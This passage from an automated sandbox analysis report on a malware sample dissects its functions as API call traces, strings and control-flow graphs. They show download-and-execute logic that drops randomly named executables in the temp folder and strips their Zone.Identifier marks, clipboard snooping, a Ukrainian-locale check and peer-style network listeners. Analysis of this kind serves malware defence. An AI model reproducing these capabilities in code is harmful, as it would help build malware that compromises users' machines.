                                                                          • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                            • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401346
                                                                            • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401352
                                                                            • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 0040135C
                                                                          • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                          • String ID:
                                                                          • API String ID: 4174406920-0
                                                                          • Opcode ID: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
                                                                          • Instruction ID: 9f6d7f02e8121356806164c5164031e4b64ed467ed2b657d4572fa9387097a74
                                                                          • Opcode Fuzzy Hash: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
                                                                          • Instruction Fuzzy Hash: E131C871A44301AFE320DF649C46F9BB6E0AF48B10F40493DF695EB2E0D3B5D544879A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 0040CF42
                                                                          • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040CF68
                                                                          • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040CF9F
                                                                          • GetTickCount.KERNEL32 ref: 0040CFB4
                                                                          • Sleep.KERNEL32(00000001), ref: 0040CFD4
                                                                          • GetTickCount.KERNEL32 ref: 0040CFDA
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CountTick$Sleepioctlsocketrecv
                                                                          • String ID:
                                                                          • API String ID: 107502007-0
                                                                          • Opcode ID: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                                                          • Instruction ID: 1a678e6439685295adbdd864bb1f175a680e3ab9afc47d2c7bf7927640be176d
                                                                          • Opcode Fuzzy Hash: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                                                          • Instruction Fuzzy Hash: B031FE7490020EEFCF04DFA4D988AEE77B1FF44315F108669E815A72D0D7749A90CB96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • htons.WS2_32(00000050), ref: 0040ACED
                                                                            • Part of subcall function 0040AC80: inet_addr.WS2_32(0040AD01), ref: 0040AC8A
                                                                            • Part of subcall function 0040AC80: gethostbyname.WS2_32(?), ref: 0040AC9D
                                                                          • socket.WS2_32(00000002,00000001,00000000), ref: 0040AD0D
                                                                          • connect.WS2_32(000000FF,?,00000010), ref: 0040AD26
                                                                          • getsockname.WS2_32(000000FF,?,00000010), ref: 0040AD58
                                                                          Strings
                                                                          • www.update.microsoft.com, xrefs: 0040ACF7
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                          • String ID: www.update.microsoft.com
                                                                          • API String ID: 4063137541-1705189816
                                                                          • Opcode ID: 5a1d85337c715bac0dcb8e8b8f2ac327c24fa7ec3f03106e8ebc05f0c3c87f0a
                                                                          • Instruction ID: ba3e2b0e6fec23725a126dc2d5d77dfcfe6771dbae9c9e174257d4c79807ff88
                                                                          • Opcode Fuzzy Hash: 5a1d85337c715bac0dcb8e8b8f2ac327c24fa7ec3f03106e8ebc05f0c3c87f0a
                                                                          • Instruction Fuzzy Hash: BA210BB5E103099BDB04DFF8D946AEEBBB5AF08300F108169E515F7390E7745A44CBAA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CryptAcquireContextW.ADVAPI32(~|@,00000000,00000000,00000001,F0000040,?,?,0040C119,~|@,00000004,?,?,0040C14E,000000FF), ref: 0040C0D3
                                                                          • CryptGenRandom.ADVAPI32(~|@,?,00000000,?,?,0040C119,~|@,00000004,?,?,0040C14E,000000FF), ref: 0040C0E9
                                                                          • CryptReleaseContext.ADVAPI32(~|@,00000000,?,?,0040C119,~|@,00000004,?,?,0040C14E,000000FF), ref: 0040C0F5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                                          • String ID: ~|@
                                                                          • API String ID: 1815803762-1417210658
                                                                          • Opcode ID: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                                                          • Instruction ID: 64b452c5f04e5b6757705d6885a7ff86aea398e2a213dd3f660bad642ac62f97
                                                                          • Opcode Fuzzy Hash: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                                                          • Instruction Fuzzy Hash: F6E01275654208FBDB24CFD5EC49FDA776CAB48700F108154F709A7190DAB5EA40DBA8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D79D,00000000), ref: 004013D5
                                                                          • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                          • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                            • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401346
                                                                            • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401352
                                                                            • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 0040135C
                                                                          • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                          • String ID:
                                                                          • API String ID: 3943618503-0
                                                                          • Opcode ID: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
                                                                          • Instruction ID: 53638d0e5b86ff224420f1c7f9a69720ea7b841d4339b56c2ae1fb68745f7462
                                                                          • Opcode Fuzzy Hash: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
                                                                          • Instruction Fuzzy Hash: CA11B974A40710AFE360DF749C0AF877AE0AF04B14F50892DF599E72E1E3F49544878A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,004075B8), ref: 0040E983
                                                                          • strcmp.NTDLL ref: 0040E992
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InfoLocalestrcmp
                                                                          • String ID: UKR
                                                                          • API String ID: 3191669094-64918367
                                                                          • Opcode ID: 1d6965906c99fb0c7d18e61921188abf55c3e63af3ccecffda9c71d66ea34e25
                                                                          • Instruction ID: aa0b77ea91eb2b23b28eec9c342f5ca45138d15d753f47792771d9b4db2dab4a
                                                                          • Opcode Fuzzy Hash: 1d6965906c99fb0c7d18e61921188abf55c3e63af3ccecffda9c71d66ea34e25
                                                                          • Instruction Fuzzy Hash: FEE0C272A4430876DA10A6A1AE03BAA771C5F11701F000076AF04A61C1E9B9962992DB
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 0040ED29
                                                                          • srand.MSVCRT ref: 0040ED30
                                                                          • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040ED50
                                                                          • strlen.NTDLL ref: 0040ED5A
                                                                          • mbstowcs.NTDLL ref: 0040ED71
                                                                          • rand.MSVCRT ref: 0040ED79
                                                                          • rand.MSVCRT ref: 0040ED8D
                                                                          • wsprintfW.USER32 ref: 0040EDB4
                                                                          • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040EDCA
                                                                          • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EDF9
                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EE28
                                                                          • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040EE5B
                                                                          • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040EE8C
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040EE9B
                                                                          • wsprintfW.USER32 ref: 0040EEB4
                                                                          • DeleteFileW.KERNEL32(?), ref: 0040EEC4
                                                                          • Sleep.KERNEL32(000003E8), ref: 0040EECF
                                                                          • Sleep.KERNEL32(000007D0), ref: 0040EEF0
                                                                          • ExitProcess.KERNEL32 ref: 0040EF18
                                                                          • DeleteFileW.KERNEL32(?), ref: 0040EF2E
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040EF3B
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040EF48
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040EF55
                                                                          • Sleep.KERNEL32(000003E8), ref: 0040EF60
                                                                          • rand.MSVCRT ref: 0040EF75
                                                                          • Sleep.KERNEL32 ref: 0040EF8C
                                                                          • rand.MSVCRT ref: 0040EF92
                                                                          • rand.MSVCRT ref: 0040EFA6
                                                                          • wsprintfW.USER32 ref: 0040EFCD
                                                                          • DeleteUrlCacheEntryW.WININET(?), ref: 0040EFDD
                                                                          • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040EFF7
                                                                          • wsprintfW.USER32 ref: 0040F017
                                                                          • DeleteFileW.KERNEL32(?), ref: 0040F027
                                                                          • Sleep.KERNEL32(000003E8), ref: 0040F032
                                                                          • Sleep.KERNEL32(000007D0), ref: 0040F053
                                                                          • ExitProcess.KERNEL32 ref: 0040F07A
                                                                          • DeleteFileW.KERNEL32(?), ref: 0040F089
                                                                          Strings
                                                                          • %s:Zone.Identifier, xrefs: 0040F00B
                                                                          • %s\%d%d.exe, xrefs: 0040EDA8
                                                                          • %s:Zone.Identifier, xrefs: 0040EEA8
                                                                          • %s\%d%d.exe, xrefs: 0040EFC1
                                                                          • %temp%, xrefs: 0040ED4B
                                                                          • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EDC5
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$Sleep$DeleteInternetrand$CloseHandlewsprintf$ExitOpenProcess$CacheCountCreateDownloadEntryEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                          • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                          • API String ID: 3526668077-2417596247
                                                                          • Opcode ID: ddf9ac5ed83cf9badb19a381914167fc1d390300ce8058f702f4e9ba32742620
                                                                          • Instruction ID: ad06c6bce1eeec4b269cf6b178fa0be949fbab599c126aebf23d2838ae6487db
                                                                          • Opcode Fuzzy Hash: ddf9ac5ed83cf9badb19a381914167fc1d390300ce8058f702f4e9ba32742620
                                                                          • Instruction Fuzzy Hash: 8291EBB1940318ABE720DB61DC49FEA3379BB88701F0484B9F209A51C1DAB99AD4CF59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 469 40b0e0-40b0f7 call 40b010 472 40b0f9 469->472 473 40b0fe-40b11a call 40ac60 strcmp 469->473 474 40b385-40b388 472->474 477 40b121-40b13d call 40ac60 strstr 473->477 478 40b11c 473->478 481 40b180-40b19c call 40ac60 strstr 477->481 482 40b13f-40b15b call 40ac60 strstr 477->482 478->474 487 40b19e-40b1ba call 40ac60 strstr 481->487 488 40b1df-40b1fb call 40ac60 strstr 481->488 489 40b17b 482->489 490 40b15d-40b179 call 40ac60 strstr 482->490 497 40b1da 487->497 498 40b1bc-40b1d8 call 40ac60 strstr 487->498 499 40b1fd-40b219 call 40ac60 strstr 488->499 500 40b23e-40b254 EnterCriticalSection 488->500 489->474 490->481 490->489 497->474 498->488 498->497 511 40b239 499->511 512 40b21b-40b237 call 40ac60 strstr 499->512 501 40b25f-40b268 500->501 504 40b299-40b2a4 call 40b390 501->504 505 40b26a-40b27a 501->505 519 40b37a-40b37f LeaveCriticalSection 504->519 520 40b2aa-40b2b8 504->520 508 40b297 505->508 509 40b27c-40b295 call 40d6e0 505->509 508->501 509->504 511->474 512->500 512->511 519->474 521 40b2ba 520->521 522 40b2be-40b2cf call 409fd0 520->522 521->522 522->519 525 40b2d5-40b2f2 call 40d6e0 522->525 528 40b2f4-40b304 525->528 529 40b34a-40b362 525->529 530 40b310-40b348 call 40a3f0 528->530 531 40b306-40b30e Sleep 528->531 532 40b368-40b373 call 40b390 529->532 530->532 531->528 532->519 537 40b375 call 40adc0 532->537 537->519
                                                                          APIs
                                                                            • Part of subcall function 0040B010: gethostname.WS2_32(?,00000100), ref: 0040B02C
                                                                            • Part of subcall function 0040B010: gethostbyname.WS2_32(?), ref: 0040B03E
                                                                          • strcmp.NTDLL ref: 0040B110
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: gethostbynamegethostnamestrcmp
                                                                          • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                          • API String ID: 2906596889-2213908610
                                                                          • Opcode ID: 7f461de13bc063d15ec1264cc637e4dc2b0045e98767113049a7a1e9a29443f4
                                                                          • Instruction ID: 14285435020103c943bf7af990fcf7992b9b4842fd13eaff794dfd4de82f65c2
                                                                          • Opcode Fuzzy Hash: 7f461de13bc063d15ec1264cc637e4dc2b0045e98767113049a7a1e9a29443f4
                                                                          • Instruction Fuzzy Hash: 5061A3B5904304A7DB10EF65DC4AAAE3B74AB50348F14843AEC05773D2E73DEA54C69E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 539 401920-401947 GetTickCount WaitForSingleObject 540 401ac9-401acf 539->540 541 40194d-401964 WSAWaitForMultipleEvents 539->541 542 4019f0-401a03 GetTickCount 541->542 543 40196a-401981 WSAEnumNetworkEvents 541->543 544 401a43-401a4c GetTickCount 542->544 545 401a05-401a14 EnterCriticalSection 542->545 543->542 546 401983-401988 543->546 547 401ab5-401ac3 WaitForSingleObject 544->547 548 401a4e-401a5d EnterCriticalSection 544->548 549 401a16-401a1d 545->549 550 401a3a-401a41 LeaveCriticalSection 545->550 546->542 551 40198a-401990 546->551 547->540 547->541 552 401aa1-401ab1 LeaveCriticalSection GetTickCount 548->552 553 401a5f-401a77 InterlockedExchangeAdd call 40d6e0 548->553 554 401a35 call 401820 549->554 555 401a1f-401a27 549->555 550->547 551->542 556 401992-4019b1 accept 551->556 552->547 564 401a97-401a9f 553->564 565 401a79-401a82 553->565 554->550 555->549 558 401a29-401a30 LeaveCriticalSection 555->558 556->542 560 4019b3-4019c2 call 4022c0 556->560 558->547 560->542 566 4019c4-4019df call 401740 560->566 564->552 564->553 565->564 567 401a84-401a8d call 40ad80 565->567 566->542 572 4019e1-4019e7 566->572 567->564 572->542 573 4019e9-4019eb call 401cf0 572->573 573->542
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 0040192C
                                                                          • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                          • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                          • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                          • accept.WS2_32(?,?,?), ref: 004019A8
                                                                          • GetTickCount.KERNEL32 ref: 004019F6
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                          • GetTickCount.KERNEL32 ref: 00401A43
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                          • GetTickCount.KERNEL32 ref: 00401AAB
                                                                          • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                          • String ID: PCOI$ilci
                                                                          • API String ID: 3345448188-3762367603
                                                                          • Opcode ID: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                                                          • Instruction ID: 30acf59a4b92f93f505059f31b2171fe0b1c4ce4dbffa3032f64cc39e79a13a9
                                                                          • Opcode Fuzzy Hash: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                                                          • Instruction Fuzzy Hash: E241F471600300ABCB209F74DC8CB9B77A9AF44720F14463DF895A72E1DB78E881CB99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • memset.NTDLL ref: 0040E758
                                                                          • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040E7A8
                                                                          • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040E7BB
                                                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E7F4
                                                                          • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E82A
                                                                          • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040E855
                                                                          • HttpSendRequestA.WININET(00000000,00411DE8,000000FF,00009E34), ref: 0040E87F
                                                                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E8BE
                                                                          • memcpy.NTDLL(00000000,?,00000000), ref: 0040E910
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040E941
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040E94E
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040E95B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                          • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                          • API String ID: 2761394606-2217117414
                                                                          • Opcode ID: 4c841f94eea498a124c4035f34500e71f511402468c94ca26de25d70c5934535
                                                                          • Instruction ID: 85fc693ee375b13e16fb66d1006c55e21916babb9bf1ea115f780426e1cf3f13
                                                                          • Opcode Fuzzy Hash: 4c841f94eea498a124c4035f34500e71f511402468c94ca26de25d70c5934535
                                                                          • Instruction Fuzzy Hash: C6513DB5A01228ABDB66CF54CC54BDA73BCAB48705F0481E9B60DA6280D7B86FC4CF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 592 405910-405932 GetWindowLongW 593 405934-40593b 592->593 594 405956-40595d 592->594 595 405941-405945 593->595 596 4059c7-4059d8 IsClipboardFormatAvailable 593->596 597 405986-40598c 594->597 598 40595f 594->598 604 405964-405981 SetClipboardViewer SetWindowLongW 595->604 605 405947-40594b 595->605 602 4059e3-4059ed IsClipboardFormatAvailable 596->602 603 4059da-4059e1 596->603 600 4059a6-4059aa 597->600 601 40598e-4059a4 SetWindowLongW 597->601 599 405b44-405b5d DefWindowProcA 598->599 606 4059c2 600->606 607 4059ac-4059bc SendMessageA 600->607 601->606 609 4059f8-405a02 IsClipboardFormatAvailable 602->609 610 4059ef-4059f6 602->610 608 405a0b-405a0f 603->608 604->599 611 405951 605->611 612 405afd-405b3e RegisterRawInputDevices ChangeClipboardChain 605->612 606->599 607->606 614 405a15-405a1f OpenClipboard 608->614 615 405adf-405ae3 608->615 609->608 613 405a04 609->613 610->608 611->599 612->599 613->608 614->615 618 405a25-405a36 GetClipboardData 614->618 616 405ae5-405af5 SendMessageA 615->616 617 405afb 615->617 616->617 617->599 619 405a38 618->619 620 405a3d-405a4e GlobalLock 618->620 619->599 621 405a50 620->621 622 405a55-405a66 620->622 621->599 623 405a68-405a6c 622->623 624 405a89-405a9c call 405630 622->624 625 405a9e-405aae call 405750 623->625 626 405a6e-405a72 623->626 632 405ab1-405ac5 GlobalUnlock CloseClipboard 624->632 625->632 628 405a74 626->628 629 405a76-405a87 call 405510 626->629 628->632 629->632 632->615 635 405ac7-405adc call 4048a0 call 40a3f0 632->635 635->615
                                                                          APIs
                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040591C
                                                                          • SetClipboardViewer.USER32(?), ref: 00405968
                                                                          • SetWindowLongW.USER32(?,000000EB,?), ref: 0040597B
                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 004059D0
                                                                          • OpenClipboard.USER32(00000000), ref: 00405A17
                                                                          • GetClipboardData.USER32(00000000), ref: 00405A29
                                                                          • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B30
                                                                          • ChangeClipboardChain.USER32(?,?), ref: 00405B3E
                                                                          • DefWindowProcA.USER32(?,?,?,?), ref: 00405B54
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                          • String ID:
                                                                          • API String ID: 3549449529-0
                                                                          • Opcode ID: 9a76300ceb1b56ddf8e5a4871e9e763aee277b276f745e0ebd9c557249eb211d
                                                                          • Instruction ID: e885106aa0884b4502b2237862738d0df8f48eeaae93079a212bc481fb1f7e33
                                                                          • Opcode Fuzzy Hash: 9a76300ceb1b56ddf8e5a4871e9e763aee277b276f745e0ebd9c557249eb211d
                                                                          • Instruction Fuzzy Hash: E771FC75A00608EFDF14DFA4D988BAFB7B4EB48300F14856AE506B6290D7799A40CF69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 00401691
